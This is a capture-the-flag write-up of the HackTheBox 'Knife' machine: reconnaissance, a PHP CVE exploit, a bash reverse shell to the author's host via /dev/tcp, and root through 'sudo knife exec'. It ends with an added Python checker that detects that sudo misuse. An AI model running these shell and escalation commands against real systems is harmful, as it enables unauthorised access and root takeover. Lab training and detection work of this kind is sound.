HackTheBox: Knife | My Journey

Yudistira Arya
3 min read, Aug 8, 2021


Let’s start with recon using nmap

nmap -sV -sS -A 10.10.10.242

Great, two ports are open. Let's check the HTTP server.

Nothing special here. Let's do some directory fuzzing.

python3 dirsearch.py -u 10.10.10.242
200 6KB http://10.10.10.242:80/index.php
200 6KB http://10.10.10.242:80/index.php/login

A login page?

Nope, that's just a rabbit hole: the page still renders index.php.

Okay, on to the next step. Let's check what technologies this website uses. I use Wappalyzer here.

Maybe there's some outdated tech? Let's check whether this PHP version has any CVE.

And fortunately, there was.
https://www.exploit-db.com/exploits/49933

Download the exploit and execute it.

And I got a user shell.

But since this shell isn't very interactive (I can't move to other directories), I'm going to set up a reverse shell first.

Host:

nc -lvp 4242

Victim:

echo "bash -i >& /dev/tcp/10.10.16.60/4242 0>&1" > /tmp/shell.sh
chmod +x /tmp/shell.sh
bash /tmp/shell.sh

Okay, let's see if we can do privilege escalation. I use sudo -l as usual.

As you can see, I can execute a program called knife with sudo. Let's check out this interesting program by executing it.

There are a lot of sub-commands you can use. I checked them one by one until I found something interesting.

After reading the documentation, I found something interesting about the exec sub-command.

Source: https://docs.chef.io/workstation/knife_exec/

Let's see if we can execute a Ruby command to gain a root shell.

sudo /usr/bin/knife exec -E "exec('/bin/bash -i')"

And gotcha.
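A defensive counterpart to the privilege escalation above, added here as an example that is not part of the original post: a small Python checker that flags sudoers rules granting unrestricted knife access and scans sudo log lines for knife exec invocations, the sub-command that evaluates arbitrary Ruby as root. The log lines are constructed samples in the standard sudo syslog shape; "lowpriv" and "host" are placeholder names.

```python
import os
import re
import shlex

# Standard sudo syslog shape: "sudo: <user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<argv>"
SUDO_LINE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:.*?USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<cmd>.+)$")

SAMPLE_LOG = [  # constructed sample lines; "lowpriv" and "host" are placeholder names
    "Aug  8 10:01:12 host sudo:  lowpriv : TTY=pts/0 ; PWD=/home/lowpriv ; USER=root ; COMMAND=/usr/bin/knife node list",
    "Aug  8 10:02:40 host sudo:  lowpriv : TTY=pts/0 ; PWD=/home/lowpriv ; USER=root ; COMMAND=/usr/bin/knife exec -E exec('/bin/bash -i')",
    "Aug  8 10:03:05 host sudo:  lowpriv : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/knife exec /tmp/run.rb",
]

def classify_knife_command(cmd):
    """Reason string if cmd is a knife call that evaluates caller-supplied Ruby, else None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes in the logged argv: fall back to whitespace split
        argv = cmd.split()
    if len(argv) < 2 or os.path.basename(argv[0]) != "knife" or argv[1] != "exec":
        return None
    if "-E" in argv or "--exec" in argv:
        return "knife exec with inline Ruby (-E/--exec)"
    return "knife exec running a Ruby script file"

def scan_sudo_log(lines):
    """(user, target_user, command, reason) for each privileged knife Ruby evaluation."""
    findings = []
    for line in lines:
        m = SUDO_LINE.search(line)
        if m:
            cmd = m.group("cmd").strip()
            reason = classify_knife_command(cmd)
            if reason:
                findings.append((m.group("user"), m.group("target"), cmd, reason))
    return findings

def sudoers_grants_unrestricted_knife(rule):
    """True when a sudoers rule lets the user run knife with any arguments: in sudoers
    a bare command path with no argument list permits arbitrary arguments."""
    spec = rule.split("=", 1)[1] if "=" in rule else ""
    spec = re.sub(r"^\s*\([^)]*\)\s*", "", spec)  # drop the (runas) list
    spec = re.sub(r"^(?:[A-Z]+:\s*)+", "", spec)   # drop NOPASSWD:/SETENV: style tags
    return any(len(c.split()) == 1 and os.path.basename(c.split()[0]) == "knife"
               for c in spec.split(","))
```

Running scan_sudo_log(SAMPLE_LOG) flags the second and third lines but not the harmless "knife node list"; restricting the sudoers rule to specific sub-commands (for example /usr/bin/knife node list) makes sudoers_grants_unrestricted_knife return False.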
